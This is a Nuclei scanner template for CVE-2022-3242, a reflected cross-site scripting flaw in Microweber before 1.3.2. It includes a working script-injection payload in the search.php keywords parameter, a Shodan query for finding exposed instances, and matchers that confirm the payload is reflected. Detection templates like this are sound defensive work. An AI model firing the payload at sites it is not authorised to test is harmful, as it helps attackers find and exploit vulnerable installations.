42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2022-3242
|
|
|
|
info:
|
|
name: Microweber <1.3.2 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.
|
|
reference:
|
|
- https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/
|
|
- https://www.tenable.com/cve/CVE-2022-3242
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-3242
|
|
- https://github.com/microweber/microweber/commit/68f0721571653db865a5fa01c7986642c82e919c
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-3242
|
|
cwe-id: CWE-94,CWE-79
|
|
epss-score: 0.02392
|
|
epss-percentile: 0.88688
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: microweber
|
|
product: microweber
|
|
shodan-query: http.favicon.hash:780351152
|
|
tags: huntr,xss,cve,cve2023,microweber
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(tolower(body), "microweber")'
|
|
condition: and
|
|
# digest: 490a00463044022023523ddde47781adf45c4b8cbf9b98d066af5a0b000645cb40b57cb27c080eed022030ae9154c57c0b600cd78c64155785dcf80d192785aa571a75eb0eb0b8f92d72:922c64590222798bb761d5b6d8e72950 |